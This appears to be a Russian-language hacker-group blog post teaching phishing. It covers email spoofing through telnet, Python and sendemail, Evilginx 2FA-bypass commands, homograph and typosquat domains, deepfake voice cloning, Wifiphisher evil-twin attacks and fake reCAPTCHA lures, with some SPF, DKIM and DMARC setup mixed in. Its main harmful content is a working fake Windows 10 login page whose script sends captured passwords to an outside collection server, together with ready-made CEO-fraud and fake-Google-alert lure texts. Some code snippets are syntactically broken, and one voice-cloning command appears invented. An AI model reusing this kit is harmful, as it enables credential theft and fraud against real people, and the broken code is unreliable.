Охота на доверие: фишинг в современном мире

Доброго дня, дамы и господа, с вами, как всегда, Parabellum Clan! Каждый из вас, наверняка, задумывался, как было бы здорово перехватить чужую электронную почту или отправить поддельное письмо от имени известной компании, а может, даже обойти двухфакторную аутентификацию, как в шпионских фильмах. Но сегодня мы расскажем и покажем, как это работает в реальности, на примере реальных техник, которые используют хакеры для фишинга и подмены почты!

Содержание:
1. HUMINT
2. Отправка поддельных писем с emkei.cz
3. Противодействуем отправке фишинговых писем
4. Обход SPF
5. Несоответствие Return-Path
6. Дипфейки и вишинг
7. Обход 2FA
8. Омографические атаки
9. Тайпсквоттинг
10. Фишинговые страницы на уровне OS
11. Wi-Fi фишинг
12. Капча на фишинге?
13. Поиск доменов с истёкшим сроком
14. Перенаправление DNS
15. Fast Flux для хакеров
16. Загрузка "доверенного" файла
17. Символы RTLO в фишинге
18. Полезные плюшки для работы с фишингом

*Сегодня без картинок, нет времени столько генерировать...

Человеческая разведка (HUMINT) и социальная инженерия в фишинге основываются на манипуляции эмоциями и поведением людей, чтобы обманом заставить их раскрыть конфиденциальную информацию. Фишеры используют HUMINT для сбора персональных данных, таких как должности, интересы и связи, чтобы создать целенаправленные атаки. Социальная инженерия усиливает эти атаки, используя эмоциональные триггеры, такие как страх, срочность, доверие и жадность. Эти техники манипулируют людьми, заставляя их принимать импульсивные решения, такие как нажатие на вредоносную ссылку или передача своих учетных данных, убеждая их в том, что запрос является законным или срочным.

Эмоции и их распознавание играют ключевую роль как для хакеов. Мы можем наблюдать такие эмоции, как страх, замешательство или облегчение, чтобы корректировать свою тактику, делая свою историю более убедительной. С другой стороны, способность распознавать эмоциональные реакции может помочь специалистам по ИБ обучать сотрудников оценивать подозрительные запросы с помощью критического мышления.

Шпоры для понимания: Сценарии фишинга и эмоциональные триггеры

1. Страх/Тревога

• Сценарий: "Ваш аккаунт был взломан. Срочно сбросьте пароль!"
• Эмоциональный триггер: Страх потерять доступ или подвергнуть свои данные риску.
• Реакция: Жертва в панике нажимает на вредоносную ссылку, не проверяя источник.

2. Любопытство

• Сценарий: "Вы получили конфиденциальный документ. Откройте для просмотра."
• Эмоциональный триггер: Интерес, вызванный загадкой или эксклюзивностью.
• Реакция: Жертва открывает вложение, которое устанавливает вредоносное ПО.

3. Срочность

• Сценарий: "Оплатите сейчас, чтобы избежать штрафов за просрочку!"
• Эмоциональный триггер: Давление действовать быстро без проверки.
• Реакция: Жертва торопится и вводит данные платежной карты на фишинговом сайте.

4. Доверие/Авторитет

• Сценарий: "Это ваш начальник. Срочно переведите деньги на этот счет."
• Эмоциональный триггер: Уважение к авторитету, страх ослушаться.
• Реакция: Жертва, полагая, что запрос исходит от начальства, выполняет его, не задавая вопросов.

5. Жадность/Восторг

• Сценарий: "Вы выиграли подарочную карту на 1000$! Нажмите, чтобы получить приз."
• Эмоциональный триггер: Желание получить награду или финансовую выгоду.
• Реакция: Жертва предоставляет личную информацию, чтобы получить несуществующий приз.

emkei.cz — это онлайн-инструмент, позволяющий отправлять поддельные электронные письма, просто заполнив форму. Этот инструмент может быть использован в фишинговых атаках и атаках социальной инженерии, так как позволяет подделать поле "От", создавая иллюзию, что письмо пришло от доверенного или официального источника. Понимание того, как злоумышленники используют такие инструменты, как Emkei.cz, помогает в разработке эффективных мер защиты.

Отправка поддельного письма с помощью Emkei.cz включает несколько простых шагов:

1. Доступ к сайту:

• Перейдите на сайт emkei.cz через браузер

2. Заполнение формы:

• От (From): Введите поддельный адрес отправителя, например, ceo@legitcompany.com
• Кому (To): Укажите email жертвы, например, victim@targetdomain.com
• Тема (Subject): Придумайте любую тему, например, "Срочно: требуется оплата"
• Сообщение (Message): Напишите текст письма, который может выглядеть так:

Уважаемый Антон Гандурасович,

Пожалуйста, переведите 5000 долларов на указанный счет. Это срочно!

С уважением,
Ваш Насяльника.

3. Настройки SMTP: Можно использовать настройки по умолчанию или настроить собственный SMTP-сервер для еще большего скрытия следов.

4. Вложение (Attachment): При желании можно прикрепить файлы (которые могут содержать вредоносное ПО или другие зловредные данные).

5. Отправка письма: После заполнения формы нажмите кнопку "Отправить", и поддельное письмо будет отправлено жертве.

Простота использования emkei.cz делает его привлекательным для начинающих хакеров. Для отправки фишинговых писем не требуются технические навыки, а письма могут выглядеть достаточно убедительно для жертв.

Предотвращение подделки писем, таких как те, что отправляются через Emkei.cz, требует многослойной стратегии защиты, сосредоточенной на методах аутентификации электронной почты и мониторинге.

1. Настройте SPF (Sender Policy Framework)

SPF — это запись в DNS, которая указывает, какие почтовые серверы имеют право отправлять письма от имени вашего домена. При правильной настройке это блокирует неавторизованные серверы (например, сервера Emkei.cz) от отправки писем от вашего домена.

Как добавить запись SPF:

• Добавьте следующее в настройки DNS вашего домена:

example.com. IN TXT "v=spf1 ip4:192.0.2.1 -all"

• ip4:192.0.2.1: указывает IP-адрес авторизованного почтового сервера
• -all: отклоняет все письма, не поступившие от авторизованных IP-адресов

Проверьте запись SPF:

Используйте онлайн-инструменты, такие как MXToolbox, или командные строки для проверки записи SPF:

dig txt example.com

Убедитесь, что запись SPF настроена правильно и включает все законные почтовые серверы вашего домена.

2. Настройте DKIM (DomainKeys Identified Mail)

DKIM добавляет криптографическую подпись к заголовкам исходящих писем. Если кто-то попытается отправить письмо от вашего домена без этой подписи (как это делает Emkei.cz), оно будет отмечено.

Шаги по настройке DKIM:

• Создайте пару ключей DKIM (открытый и закрытый ключи)
• Опубликуйте открытый ключ в виде DNS TXT записи для вашего домена
• Настройте ваш почтовый сервер для подписывания исходящих писем с помощью закрытого ключа

Пример записи DKIM в DNS:

default._domainkey.example.com. IN TXT "v=DKIM1; k=rsa; p=ваш_публичный_ключ"

Проверьте запись DKIM:

dig txt default._domainkey.example.com

Проверьте правильность настройки DKIM с помощью инструментов, таких как dmarcian.com.

3. Настройте DMARC (Domain-based Message Authentication, Reporting, and Conformance)

DMARC позволяет владельцам доменов указывать, как серверы-получатели должны обрабатывать письма, не прошедшие проверку SPF и DKIM (например, отклонять или помещать в карантин).

Шаги по настройке DMARC:

Добавьте следующую запись в DNS TXT:

_dmarc.example.com. IN TXT "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com; ruf=mailto:forensic-reports@example.com"

• p=reject: письма, не прошедшие проверки DMARC, будут отклонены
• rua: агрегированные отчеты будут отправляться на dmarc- reports@example.com
• ruf: форензические отчеты будут отправляться на forensic-reports@example.com

Проверьте запись DMARC:

dig txt _dmarc.example.com

Убедитесь, что ваша политика DMARC правильно опубликована и признана серверами-получателями.

4. Используйте фильтры электронной почты и решения для обеспечения безопасности

Фильтрация электронной почты может автоматически блокировать или помещать в карантин подозрительные письма, в том числе отправленные через Emkei.cz.

• Используйте шлюзы безопасности для электронной почты: Решения, такие как Proofpoint, Mimecast или Microsoft Defender для Office 365, могут обнаруживать и блокировать поддельные письма на основе поведенческих паттернов и аномалий.
• Включите фильтры против подмены: Большинство корпоративных систем электронной почты (например, Google Workspace или Microsoft Exchange) позволяют по умолчанию включить обнаружение и фильтрацию подмены.

5. Мониторьте и анализируйте журналы

Почтовые серверы и системы безопасности генерируют журналы, которые могут выявлять подозрительную активность, такую как письма, не прошедшие проверки SPF, DKIM или DMARC. Регулярно просматривайте эти журналы на предмет попыток подделки.

Например, на почтовых серверах Postfix проверьте журнал на наличие отклоненных писем:

grep "reject" /var/log/mail.log

Это покажет письма, которые были заблокированы из-за несоответствия SPF, DKIM или DMARC.

Пример команды для применения SPF, DKIM и DMARC на сервере Postfix:

1. Принудительная проверка SPF в Postfix:

• Добавьте следующее в файл /etc/postfix/main.cf:

smtpd_recipient_restrictions =
    reject_unauth_destination
    check_policy_service unix:private/policyd-spf

2. Установка и настройка DKIM с OpenDKIM:

• Установите OpenDKIM:

sudo apt-get install opendkim opendkim-tools

• Настройте Postfix для использования OpenDKIM, отредактировав /etc/postfix/main.cf:

milter_default_action = accept
milter_protocol = 2
smtpd_milters = unix:/opendkim/opendkim.sock
non_smtpd_milters = unix:/opendkim/opendkim.sock

3. Включение DMARC в Postfix:

Установите и настройте службу политики DMARC, такую как OpenDMARC, и настройте её в Postfix аналогично OpenDKIM.

SPF (Sender Policy Framework) — это механизм аутентификации электронной почты, который помогает предотвратить отправку спам-сообщений от имени вашего домена. SPF работает, позволяя владельцам доменов указывать, какие почтовые серверы имеют право отправлять письма от имени их домена. Когда почтовый сервер получает сообщение, он проверяет SPF-запись отправляющего домена, чтобы убедиться, что IP-адрес отправителя имеет право отправлять письма от имени этого домена. Если проверка SPF не проходит, сервер может пометить сообщение как спам или отклонить его.

1. Создание записи в DNS: Владелец домена публикует SPF-запись в DNS (системе доменных имен). Эта запись перечисляет все авторизованные почтовые серверы для домена.

Пример SPF-записи:

v=spf1 ip4:192.168.1.1 include:example.com -all

• Эта запись разрешает IP-адресу 192.168.1.1 и домену example.com отправлять письма от имени указанного домена. "-all" указывает, что любые другие IP-адреса должны не проходить проверку SPF.

2. Проверка получающим сервером: Когда получатель получает электронное письмо, сервер проверяет записи DNS отправляющего домена. Если IP-адрес сервера-отправителя совпадает с авторизованным списком, проверка SPF проходит.

Несмотря на наличие SPF-защиты, подмена почты остаётся проблемой, особенно если домены не применяют SPF или серверы-получатели не настроены на отклонение писем, не прошедших проверку SPF.

Подмена почты включает отправку электронного письма, которое кажется отправленным с чужого домена или адреса электронной почты. Это часто используется для фишинговых атак или атак социальной инженерии. Хотя SPF может предотвратить доставку фишинговых писем, мы можем попытаться обойти SPF на плохо настроенных системах или нацелиться на системы, где отсутствуют соответствующие протоколы аутентификации почты.

Инструменты для подмены почты

Вот упрощённое руководство по отправке поддельного письма с использованием Telnet или инструментов, таких как Sendmail или библиотеки SMTP на Python. Эти методы предназначены исключительно в образовательных целях)

Telnet можно использовать для прямого общения с SMTP-сервером и отправки электронных писем. Вот как это работает:

Шаги:

• Откройте терминал и подключитесь к почтовому серверу с помощью Telnet:

telnet smtp.example.com 25

• Сервер ответит. Далее представьтесь серверу с помощью команды SMTP:

HELO example.com

• Установите поддельный адрес отправителя:

MAIL FROM: <fake@example.com>

• Установите адрес получателя:

RCPT TO: <victim@targetdomain.com>

• Начните составление сообщения:

DATA

• Напишите тело письма и заголовки:

Subject: Important Update
From: CEO <ceo@company.com>
To: victim@targetdomain.co
Hello,
This is a fake email. Please follow the instructions below...
.

• Завершите сообщение точкой (.) на новой строке:

.

• Завершите сессию:

QUIT

Теперь фишинговое письмо будет отправлено получателю, возможно, обойдя слабые меры безопасности.

Использование Python для подмены почты

Библиотека smtplib в Python может быть использована для скриптовой отправки электронных писем, включая поддельные сообщения.

Пример на Python:

import smtplib

# Настройка сервера
server = smtplib.SMTP('smtp.example.com', 25)  # Замените на целевой SMTP-сервер и порт
server.ehlo()

# Составление письма
from_email = "ceo@company.com"  # Поддельный отправитель
to_email = "victim@targetdomain.com"
subject = "Urgent: Security Update"
message = f"""\
From: CEO <ceo@company.com>
To: <victim@targetdomain.com>
Subject: {subject

Dear User,

Please reset your password immediately at the following link:
http://malicious-link.com

Sincerely,
CEO
"""

# Отправка письма
server.sendmail(from_email, to_email, message)
server.quit()

Как защититься от подмены почты

Чтобы защититься от поддельных писем, организации должны внедрить и строго следовать следующим механизмам:

• SPF: Убедитесь, что SPF-записи настроены правильно для вашего домена.
• DKIM (DomainKeys Identified Mail): Подписывайте исходящие письма цифровой подписью.
• DMARC (Domain-based Message Authentication, Reporting, and Conformance): Применяйте политики, которые указывают серверам-получателям, как обрабатывать письма, не прошедшие проверку SPF или DKIM.
• Фильтрация почты: Используйте продвинутые фильтры для электронной почты, чтобы обнаруживать и блокировать подозрительные письма, даже если SPF и DKIM проверки пройдены.
• Обучение сотрудников: Обучайте сотрудников распознавать фишинговые письма и понимать риски подмены почты.

Один из самых распространённых методов фишинга заключается в подделке адреса отправителя, чтобы электронное письмо выглядело как сообщение от доверенного источника. Быстрый способ выявить это — сравнить поле "От" с "Return-Path" в заголовке письма. Атакующий подделывает поле "From", но настоящий сервер, отправляющий письмо, может быть другим, что позволяет распознать атаку.

Шаги для проверки отправителя и Return-Path:

1. Откройте письмо
2. Нажмите на три точки (⋮) в правом верхнем углу письма и выберите "Показать оригинал" (например, в Gmail)
3. Проверьте поле "Sender" в теле письма и поле "Return-Path" в оригинальных заголовках
4. Если "Sender" (видимый в письме) и "Return-Path" (в исходных заголовках) не совпадают, это вероятный признак фишинговой атаки

Сценарий атаки — код для отправки поддельного письма с поддельным Return-Path:

Атакующий может использовать такие инструменты, как Sendmail или SendEmail, чтобы подделать адрес "From", задав при этом другой "Return-Path":

sendemail -f attacker@fakecompany.com -t victim@legitcompany.com -u "Urgent: Payment Required" \
-m "Please process the payment today." \
-s smtp.fakeserver.com:25 -o message-header="Return-Path: <attackerserver@malicious.com>"

В этом примере атакующий устанавливает Return-Path на другой сервер. При выборе "Показать оригинал" получатель может обнаружить это несоответствие и распознать фальшивку.

Проверка IP-адреса почтового сервера

Злоумышленники часто используют скомпрометированные или неавторизованные почтовые серверы для отправки фишинговых писем. Проверка IP-адреса сервера, отправляющего письмо, может показать, является ли сервер доверенным. Инструменты, такие как MXToolbox, могут помочь определить, находится ли отправляющий IP-адрес в чёрном списке, что может сигнализировать о мошенничестве.

Шаги для проверки IP-адреса:

1. Откройте исходник письма (например, "Показать оригинал" в Gmail).

2. Найдите IP-адрес сервера в заголовках "Received". Например:

Received: from smtp.maliciousserver.com ([192.0.2.123])

3. Используйте MXToolbox или другой сервис для проверки, находится ли IP-адрес в чёрном списке:

• Перейдите на MXToolbox и введите IP-адрес.

4. Если IP-адрес в чёрном списке или подозрителен, письмо, скорее всего, является фишинговым

Сценарий атаки — отправка поддельного письма с пользовательским SMTP:

Атакующий может использовать пользовательский SMTP-сервер для отправки поддельного письма:

sendemail -f ceo@legitcompany.com -t victim@target.com \
-u "Invoice Payment Required" -m "Please pay the invoice attached." \
-s smtp.maliciousserver.com:25

IP-адрес smtp.maliciousserver.com можно проверить на наличие в чёрном списке, чтобы выявить его злонамеренные намерения.

Если проверка SPF или DMARC не пройдена, письмо может быть подделано.

Сценарий атаки — обход SPF и отправка фишинговых писем:

SPF может быть обойдён, если запись SPF целевого домена настроена неправильно, например, при использовании мягкого отказа (~all) вместо жёсткого отказа (-all). Вот как может действовать злоумышленник:

Запись SPF домена:

v=spf1 ip4:192.0.2.1 ~all

Мягкий отказ (~all) означает, что неавторизованные серверы будут отмечены, но не отклонены.

Отправка поддельного письма с неавторизованного сервера:

sendemail -f finance@legitcompany.com -t victim@targetdomain.com \
-u "Payment Information" -m "Please complete the attached invoice." \
-s smtp.attacker.com:25

Поскольку SPF настроен на мягкий отказ, письмо может быть доставлено, даже если оно отправлено с неавторизованного сервера.

Методы предотвращения:

Чтобы защитить вашу почтовую систему от фишинговых атак, важно внедрить и соблюдать лучшие практики безопасности, такие как SPF, DKIM и DMARC, с правильными настройками.

Настройка SPF-записи:

Убедитесь, что ваша SPF-запись чётко определяет, какие серверы могут отправлять письма от имени вашего домена:

1. Отредактируйте DNS для добавления записи SPF:

example.com. IN TXT "v=spf1 ip4:192.0.2.1 -all"

2. Проверьте вашу запись SPF:

• Используйте инструмент, такой как MXToolbox:

dig txt example.com

Настройка DKIM:
1. Сгенерируйте ключ DKIM:

• Используйте такие инструменты, как opendkim, для генерации публичных и частных ключей

opendkim-genkey -s default -d example.com

2. Добавьте публичный ключ в DNS:

default._domainkey.example.com. IN TXT "v=DKIM1; k=rsa; p=MIGf...your_public_key..."

3. Настройте ваш почтовый сервер для подписывания исходящих писем с использованием DKIM.

Настройка DMARC:

1. Добавьте политику DMARC в DNS:

_dmarc.example.com. IN TXT "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com"

2. Проверьте DMARC:

• Используйте MXToolbox, чтобы убедиться, что ваша конфигурация DMARC активна:

dig txt _dmarc.example.com

Фишинг значительно эволюционировал, внедрив сложные технологии, такие как deepfake-видео и синтезированные ИИ голоса, чтобы обманывать и манипулировать жертвами. Эти новые методы делают фишинговые атаки более убедительными, так как злоумышленники могут подражать доверенным лицам как в визуальном, так и в аудиоформатах. Это добавляет новый уровень сложности к традиционным методам фишинга и требует более продвинутых мер защиты.

1. Фишинг с использованием deepfake-видео

Deepfake-фишинг включает использование ИИ-сгенерированных видео для имитации доверенных лиц, таких как руководители компаний или публичные фигуры. Атакующие могут использовать deepfake в фишинговых кампаниях, чтобы заставить сотрудников или людей выполнить действия, такие как перевод денег, раскрытие конфиденциальной информации или переход по вредоносным ссылкам.

Сценарий атаки с использованием deepfake-видео

Хакеры используют ИИ-инструменты, такие как DeepFaceLab или FaceSwap, чтобы создать видео, где они подражают высокопоставленному руководителю или доверенному лицу. Затем они могут отправить фишинговое письмо или сообщение с встраиванием этого видео, призывая жертву к срочным действиям.

Пример создания deepfake-видео с использованием DeepFaceLab:

• Установите DeepFaceLab и загрузите предобученные модели:

git clone https://github.com/iperov/DeepFaceLab.git
cd DeepFaceLab

• Соберите видео данных для подражания (исходное видео) и видео актёра (целевая видеозапись)
• Извлеките лица из исходного видео:

python main.py extract --input-dir path/to/source_video --output-dir path/to/faces

• Обучите модель для создания deepfake:

python main.py train --data-dir path/to/dataset

• Сгенерируйте deepfake-видео:

python main.py merge --input-dir path/to/trained_model --output-dir path/to/output_video

Фишинг с использованием ИИ-сгенерированного голоса

ИИ-сгенерированные поддельные голоса, известные как голосовые deepfake или vishing (voice phishing), могут использоваться для имитации доверенных лиц по телефону или в голосовых сообщениях. Злоумышленники могут синтезировать голос человека, используя алгоритмы машинного обучения, делая фишинговые атаки более убедительными.

Сценарий атаки с использованием поддельного голоса

Инструменты, такие как Descript или Lyrebird, могут быть использованы для создания голосового deepfake после тренировки ИИ на примере голоса цели.

Пример процесса с использованием Descript:

• Запишите или соберите пример голоса цели (например, из публичных выступлений, видео или подкастов).
• Обучите AI имитировать голос:

descript clone --voice-sample path/to/voice_sample.wav --output voice_model

• Сгенерируйте голосовой клип с использованием клонированного голоса:

descript synthesize --model voice_model --text "Please approve this fund transfer by end of day."

Vishing атака:

Атакующий использует сгенерированный ИИ голос для звонков или отправки голосовых сообщений, выдавая себя за руководителя или менеджера. Например, злоумышленник может позвонить сотруднику и потребовать перевести деньги или предоставить конфиденциальные данные.

Пример сценария голосового сообщения:

"Привет, это ваш генеральный директор. Я на срочной встрече и мне нужно, чтобы вы немедленно перевели $15,000 на этот счёт. Я скоро отправлю вам детали по электронной почте. Спасибо!"

Методы предотвращения фишинга с использованием поддельного голоса:

• Аутентификация по голосовым биометрическим данным: Используйте инструменты для аутентификации по голосу, такие как Nuance и Pindrop, которые могут обнаруживать аномалии в голосовых паттернах.
• Протоколы обратного звонка: Внедрите строгие политики обратного звонка, где сотрудники обязаны проверять любые финансовые или конфиденциальные запросы, перезванивая на известный и проверенный номер телефона.
• Анализ голоса с помощью ИИ в реальном времени: Продвинутые ИИ-инструменты могут анализировать входящие звонки в реальном времени, чтобы определить, является ли голос синтетическим или сгенерированным, помогая выявить подозрительные звонки.

Evilginx 3.0 — это мощный инструмент для проведения продвинутых фишинговых атак, специально разработанный для обхода двухфакторной аутентификации (2FA). Он работает как обратный прокси-сервер, перехватывая и передавая данные между жертвой и легитимной службой. Это позволяет злоумышленникам захватывать учетные данные для входа и токены аутентификации, даже когда жертва использует 2FA, включая одноразовые пароли на основе времени (TOTP) и SMS-коды.

Сценарий атаки: Использование Evilginx 3.0 для фишинга и обхода 2FA

Настройка и конфигурация: Evilginx работает как посредник (MITM) между жертвой и настоящей страницей для входа. Он может захватывать как имя пользователя и пароль, так и сессионный токен, который создаётся после успешного прохождения 2FA.

phishlets hostname google phishingdomain.com
phishlets enable google
lures create google

• Теперь Evilginx клонирует страницу входа Google на домене phishingdomain.com

Создание фишинговой ссылки: После включения "phishlet" и "lure", Evilginx генерирует фишинговую ссылку, которая перенаправит жертв на поддельную страницу для входа.

lures get-url 0

• Эта ссылка будет выглядеть как реальная страница входа и использовать HTTPS, что сделает атаку более убедительной.

Проведение фишинговой атаки

• Отправка фишинговой ссылки: Атакующий отправляет фишинговую ссылку жертве через электронную почту, SMS или с помощью социальной инженерии.

Фишинговое письмо:

Тема: Срочно: Необычная попытка вход

Привет,
Мы обнаружили необычную попытку входа в ваш аккаунт Google. Пожалуйста, перейдите по ссылке ниже, чтобы подтвердить вашу личность:
https://phishingdomain.com/google/login

С уважением,
Команда безопасности Google

• Жертва вводит учетные данные: Когда жертва нажимает на ссылку, её перенаправляют на поддельную страницу входа, хостируемую Evilginx. Она вводит свои учетные данные и код 2FA.
• Evilginx захватывает учетные данные и 2FA-токен: Evilginx перехватывает имя пользователя, пароль и токен 2FA (OTP) и передаёт их настоящей службе. Служба возвращает сессионную куку, которую также захватывает Evilginx.

Пример захваченных учетных данных:

[201.202.45.12] [google] [user@gmail.com] [password123]
[google] Сессионная кука захвачена: GA1.2.1234567890.session

Механизмы защиты от фишинга с Evilginx и обхода 2FA

Для защиты от таких сложных атак на фишинг необходим многоуровневый подход:

• Использование аппаратных ключей FIDO2/WebAuthn: Хотя Evilginx может обойти традиционные методы 2FA (TOTP, SMS и т.д.), аутентификация на основе аппаратных ключей, таких как FIDO2 или WebAuthn, не может быть скомпрометирована при атаке "человек посередине". Эти устройства генерируют криптографический ключ, уникальный для каждой сессии, что делает его кражу невозможной.

Пример: YubiKey или Google Titan Key.

Омографические атаки — это тип фишинговой атаки, которая использует визуальное сходство символов из разных наборов символов (обычно Unicode), чтобы создавать вредоносные URL-адреса, выглядящие почти идентичными легитимным. Злоумышленники используют такие обманные URL, чтобы обманом заставить пользователей перейти на вредоносные сайты, принимая их за настоящие. Эта техника особенно опасна, потому что пользователи могут не заметить незначительные различия между легитимными и вредоносными URL.

Например, возьмем легитимный домен apple.com. Атакующий может создать вредоносный URL, такой как аррle.com, где символы а и р на самом деле являются кириллическими буквами, а не латинскими, как в легитимном домене. Для неподготовленного пользователя оба URL могут показаться идентичными, но они ведут на разные веб-сайты.

Хакеры используют такие фальшивые URL в фишинговых письмах, кампаниях социальной инженерии или вредоносной рекламе, чтобы обманом получить конфиденциальную информацию, такую как учетные данные, данные кредитных карт или личную информацию.

Инструменты для омографических атаки:

Хакеры могут использовать несколько онлайн-инструментов или скриптов для создания URL с омографами. Например, с помощью библиотеки Python idna (Internationalized Domain Names in Applications) хакер может конвертировать символы Unicode в Punycode для регистрации доменов, похожих на легитимные.

Пример создания домена омографа на Python:

import idna
# Оригинальный домен
original_domain = "apple.com"
# Создание домена-омографа с использованием кириллических букв
homograph_domain = "аррle.com"
# Конвертация домена-омографа в Punycode
punycode_domain = idna.encode(homograph_domain).decode(
print(f"Домен-гомограф в Punycode: {punycode_domain}"

Результат:

Домен-гомограф в Punycode: xn--80ak6aa92e.com

• В данном примере кириллические буквы "а" и "р" выглядят как латинские, но на самом деле это разные символы.

Тайпсквоттинг — это ещё одна форма фишинговой атаки, при которой хакер регистрирует доменные имена, похожие на легитимные, но содержащие опечатки или небольшие вариации. Цель таких атак — использовать распространённые ошибки, которые пользователи совершают при вводе URL-адресов. Typosquatting-URL-адреса часто имитируют популярные веб-сайты, обманывая пользователей, которые думают, что они находятся на легитимном сайте.

Например, легитимный домен может быть google.com, но злоумышленник может зарегистрировать домен gooogle.com (с дополнительной буквой "о"). Если пользователь случайно введёт неверный URL, он может попасть на фишинговый сайт, созданный для кражи его данных.

Хакеры также используют тайпсквоттинг для фишинговых атак через электронную почту, создавая письма, которые выглядят как отправленные с легитимных доменов, но немного изменённые. Например, письмо с адреса support@paypal.com может быть подделано как support@paypai.com.

Инструменты для тайпсквоттинг атак:

• Полезным инструментом для тестирования и генерации доменов с опечатками является PhishiUrl, доступный на GitHub. Этот инструмент автоматизирует процесс создания доменов с опечатками или похожих на легитимные, которые могут быть использованы для фишинговых атак.

Пример использования PhishiUrl:

git clone https://github.com/EmadYaY/PhishiUrl.git
cd PhishiUrl
python3 phishiurl.py --domain google.com --type squatting

Этот инструмент поможет сгенерировать список доменов, которые имитируют легитимный сайт, включая небольшие изменения или опечатки, что может быть полезно как для тестирования безопасности, так и для атак, если такие домены используются хакеры.

Фишинговые атаки могут быть направлены на кражу учетных данных операционной системы (OS) путём имитации страницы входа, которая выглядит аутентично для пользователя. Ниже приведён пример создания фишинговой страницы, имитирующей экран входа для Windows, macOS и Linux. Цель — получить учетные данные пользователя, когда он введет их на якобы легитимной форме входа.

Фишинговая страница для Windows OS

Эта фишинговая страница имитирует экран входа в Windows 10 и использует JavaScript для захвата учетных данных. Она предназначена для работы в режиме продажи (kiosk mode), чтобы предотвратить возможность выхода пользователя из приложения.

Инструкции по настройке:

1. Создание файла index.html: Этот HTML-файл должен содержать форму для входа, стилизованную под экран входа Windows 10. Форма захватывает данные пользователя и отправляет их на сервер.

<!DOCTYPE html>
<html>
<head>
    <title>Windows 10 Login</title>
    <style>
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background-color: #1a1a1a;
            color: white;
            text-align: center;
            padding-top: 20%;
        }
        .login-container {
            background-color: #2d2d2d;
            border-radius: 8px;
            display: inline-block;
            padding: 20px;
        }
        input[type="text"], input[type="password"] {
            padding: 10px;
            margin: 10px;
            border-radius: 5px;
            border: none;
            width: 200px;
        }
        input[type="submit"] {
            padding: 10px 20px;
            border-radius: 5px;
            border: none;
            background-color: #0078d7;
            color: white;
            cursor: pointer;
        }
    </style>
</head>
<body>
    <div class="login-container">
        <h1>Windows 10</h1>
        <form id="login-form">
            <input type="text" id="username" placeholder="Username" required><br>
            <input type="password" id="password" placeholder="Password" required><br>
            <input type="submit" value="Sign in">
        </form>
    </div>
    <script>
        document.getElementById('login-form').addEventListener('submit', function(e) {
            e.preventDefault();
            var username = document.getElementById('username').value;
            var password = document.getElementById('password').value;
            fetch('http://yourserver.com/collect', {
                method: 'POST',
                headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
                body: 'username=' + encodeURIComponent(username) + '&password=' + encodeURIComponent(password)
            }).then(response => response.text())
            .then(data => console.log(data));
            // Показать сообщение об ошибке после отправки
            alert('Invalid password. Please try again.');
        });
    </script>
</body>
</html>

2. Запуск в режиме продажи: Запустите фишинговую страницу в режиме киоска (kiosk mode), чтобы пользователи не могли выйти из нее.

Chrome:

"C:\Program Files\Google\Chrome\Application\chrome.exe" --kiosk file:///path/to/index.html

Edge:

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk file:///path/to/index.html --edge-kiosk-type=fullscreen

Firefox:

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk file:///path/to/index.html

Этот пример демонстрирует, как хакеры могут создавать фишинговые страницы, имитирующие экран входа в Windows. Подобные атаки могут быть развернуты для кражи учетных данных пользователей, включая их имена и пароли.

Wifiphisher — это универсальный инструмент, используемый в red teaming и для оценки безопасности Wi-Fi, позволяющий проводить сложные фишинговые атаки через беспроводные сети. Эта платформа помогает пентестерам создавать поддельные точки доступа и выполнять различные атаки для захвата конфиденциальной информации или распространения вредоносного ПО. Вот подробный обзор его функций и принципов работы:

1. Достижение положения Man-in-the-Middle (MITM)

Первый этап Wi-Fi фишинга — это создание положения «человек посередине» (MITM), когда злоумышленник становится посредником между целевыми клиентами и легитимной сетью. Wifiphisher использует несколько методов для этого:

• Атака Evil Twin: Создаётся поддельная точка доступа с таким же SSID, как у легитимной сети, чтобы обманом заставить клиентов подключиться к ней.
• Атака KARMA: Имитируется общедоступная сеть, к которой устройства часто подключаются, заманивая их к поддельной точке доступа.
• Атака Known Beacons: Транслируется список распространённых SSID, к которым подключались устройства в прошлом, что увеличивает шансы успешного подключения.

Для повышения эффективности этих атак Wifiphisher отправляет пакеты деаутентификации или диссоциации, прерывая текущие соединения и вынуждая клиентов переподключиться к поддельной точке доступа.

2. Проведение фишинговых атак

Когда Wifiphisher оказывается в позиции MITM, можно выполнять различные фишинговые атаки и распространять вредоносное ПО:

• Веб-фишинг: Создаются и предоставляются поддельные страницы входа для захвата учетных данных ничего не подозревающих пользователей. Например, имитация диспетчера сети Windows может заставить пользователя ввести свой WPA/WPA2 Pre-Shared Key.
• Распространение вредоносного ПО: Можно настроить сценарии для доставки вредоносных программ на устройства жертв. Например, сценарий «Обновление прошивки» может предложить пользователю загрузить вредоносный файл, замаскированный под обновление прошивки.

Пример выполнения атаки Evil Twin с кастомным сценарием:

wifiphisher -aI wlan0 -jI wlan4 -p firmware-upgrade --handshake-capture handshake.pcap

• Автоматическая нацеленность на конкретную сеть и сценарий:

wifiphisher --essid CONFERENCE_WIFI -p plugin_update -pK s3cr3tp4ssw0rd

• Запуск открытой сети с фишингом через OAuth:

wifiphisher --essid "FREE WI-FI" -p oauth-login -kB

Фишинговый метод с поддельной reCAPTCHA включает создание страницы, которая имитирует реальную форму проверки reCAPTCHA, чтобы обманом заставить пользователей выполнять вредоносные команды на своих системах. Этот метод использует привычность и доверие пользователей к формам reCAPTCHA, чтобы обойти их бдительность в отношении безопасности.

Сценарий атаки:

Создание приманки: Хакер создаёт поддельную страницу reCAPTCHA, которая просит пользователей подтвердить, что они "не робот". Дизайн этой страницы максимально похож на настоящую страницу проверки Google reCAPTCHA.

На странице есть кнопка или форма, с которой взаимодействуют пользователи, и которая побуждает их открыть диалоговое окно "Выполнить" в Windows (Win+R) и вставить команду, которая была скопирована в их буфер обмена через фишинговую страницу.

Исполнение: Когда пользователь вставляет команду в диалоговое окно, она выполняется на его системе. Эта команда может быть вредоносным скриптом или программой, предназначенной для кражи данных, установки вредоносного ПО или выполнения других вредоносных действий.

Фишинговая страница может включать фальшивые сообщения об ошибках или дополнительные инструкции, чтобы пользователь не терял интерес и следовал до конца, выполняя команду.

